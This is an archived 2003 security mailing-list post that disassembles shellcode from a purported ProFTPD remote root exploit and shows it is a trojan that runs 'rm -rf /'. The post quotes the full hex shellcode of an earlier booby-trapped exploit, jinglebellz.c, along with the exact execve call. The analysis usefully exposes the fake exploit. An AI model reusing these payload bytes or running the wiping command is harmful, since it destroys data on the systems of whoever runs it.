lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <5.1.0.14.0.20031024213308.02c263d0@pop3.arrakis.es>
From: zeroboy at arrakis.es (zero)
Subject: ProFTPD-1.2.9rc2 remote root exploit

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hmmm, let's see:

Dump of assembler code for function shellcode:
0x08049480 <shellcode+0>:       xor    %eax,%eax
0x08049482 <shellcode+2>:       push   %eax
0x08049483 <shellcode+3>:       push   $0x582f2066
0x08049488 <shellcode+8>:       push   $0x722d206d
0x0804948d <shellcode+13>:      push   $0x7258632d
0x08049492 <shellcode+18>:      push   $0x41414141
0x08049497 <shellcode+23>:      push   $0x41414141
0x0804949c <shellcode+28>:      push   $0x41414141
0x080494a1 <shellcode+33>:      push   $0x41414141
0x080494a6 <shellcode+38>:      push   $0x4368732f
0x080494ab <shellcode+43>:      push   $0x6e69622f // 
/bin/shCAAAAAAAAAAAAAAAA/cXrm -rf /X
0x080494b0 <shellcode+48>:      xor    %eax,%eax
0x080494b2 <shellcode+50>:      mov    %al,0x7(%esp,1)
0x080494b6 <shellcode+54>:      mov    %al,0x1a(%esp,1)
0x080494ba <shellcode+58>:      mov    %al,0x23(%esp,1)
0x080494be <shellcode+62>:      mov    %esp,0x8(%esp,1)
0x080494c2 <shellcode+66>:      xor    %ebx,%ebx
0x080494c4 <shellcode+68>:      lea    0x18(%esp,1),%ebx
0x080494c8 <shellcode+72>:      mov    %ebx,0xc(%esp,1)
0x080494cc <shellcode+76>:      xor    %ebx,%ebx
0x080494ce <shellcode+78>:      lea    0x1b(%esp,1),%ebx
0x080494d2 <shellcode+82>:      mov    %ebx,0x10(%esp,1)
0x080494d6 <shellcode+86>:      mov    %eax,0x14(%esp,1)
0x080494da <shellcode+90>:      xor    %ebx,%ebx
0x080494dc <shellcode+92>:      mov    %esp,%ebx
0x080494de <shellcode+94>:      lea    0x8(%esp,1),%ecx
0x080494e2 <shellcode+98>:      xor    %edx,%edx
0x080494e4 <shellcode+100>:     lea    0x14(%esp,1),%edx
0x080494e8 <shellcode+104>:     mov    $0xb,%al
0x080494ea <shellcode+106>:     int    $0x80
0x080494ec <shellcode+108>:     xor    %ebx,%ebx
0x080494ee <shellcode+110>:     xor    %eax,%eax
0x080494f0 <shellcode+112>:     inc    %eax
0x080494f1 <shellcode+113>:     int    $0x80
0x080494f3 <shellcode+115>:     add    %al,(%eax)
End of assembler dump.

Let's give credits to the original c0d3rs of this shellcode. Nobody 
remembers jinglebellz.c?

<snip>
/*
            jinglebellz.c - local/remote exploit for mpg123
            (c) 2003 GOBBLES Security seXForces

[...]

unsigned char linux_shellcode[] = /* contributed by antiNSA */
         "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x3b\x50\x31\xc0\x68\x6f"
         "\x72\x74\x0a\x68\x6f\x20\x61\x62\x68\x2d\x63\x20\x74\x68\x43"
         "\x54\x52\x4c\x68\x73\x2e\x2e\x20\x68\x63\x6f\x6e\x64\x68\x35"
         "\x20\x73\x65\x68\x20\x69\x6e\x20\x68\x72\x66\x20\x7e\x68\x72"
         "\x6d\x20\x2d\xb3\x02\x89\xe1\xb2\x29\xb0\x04\xcd\x80\x31\xc0"
         "\x31\xff\xb0\x05\x89\xc7\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66"
         "\xba\x70\x50\x52\xb3\x02\x89\xe1\x31\xd2\xb2\x02\xb0\x04\xcd"
         "\x80\x31\xc0\x31\xdb\x31\xc9\x50\x40\x50\x89\xe3\xb0\xa2\xcd"
         "\x80\x4f\x31\xc0\x39\xc7\x75\xd1\x31\xc0\x31\xdb\x31\xc9\x31"
         "\xd2\x68\x66\x20\x7e\x58\x68\x6d\x20\x2d\x72\x68\x2d\x63\x58"
         "\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41\x41\x41"
         "\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f\x62\x69"
         "\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44\x24\x23"
         "\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24\x0c\x31"
         "\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14\x31\xdb"
         "\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0\x0b\xcd"
         "\x80\x31\xdb\x31\xc0\x40\xcd\x80";

</snip>

Well well, just a nice copy paste of some of it? :pPpPpPppP

And the exact cmd is:
execve("/bin/sh", {"/bin/sh", "-c", "rm -rf /", NULL}, {"rm -rf /", NULL})

NOTE: In this one ~ is change for a nicer one /

Have a nice turkey.

Cheerz



www.citfi.org
www.podergeek.com
**********************************
"The further backward you look, the further forward you can see" Winston 
Churchill
"Access is GOD..."

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>

iQA/AwUBP5lx/Q0R8jZM93x8EQJCdwCg9HfcZVDSO8/JCA17lHdkkKT7nKEAn0C6
l9RpeQ2ZrufRkkV3dflO1dTB
=kkQd
-----END PGP SIGNATURE-----


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ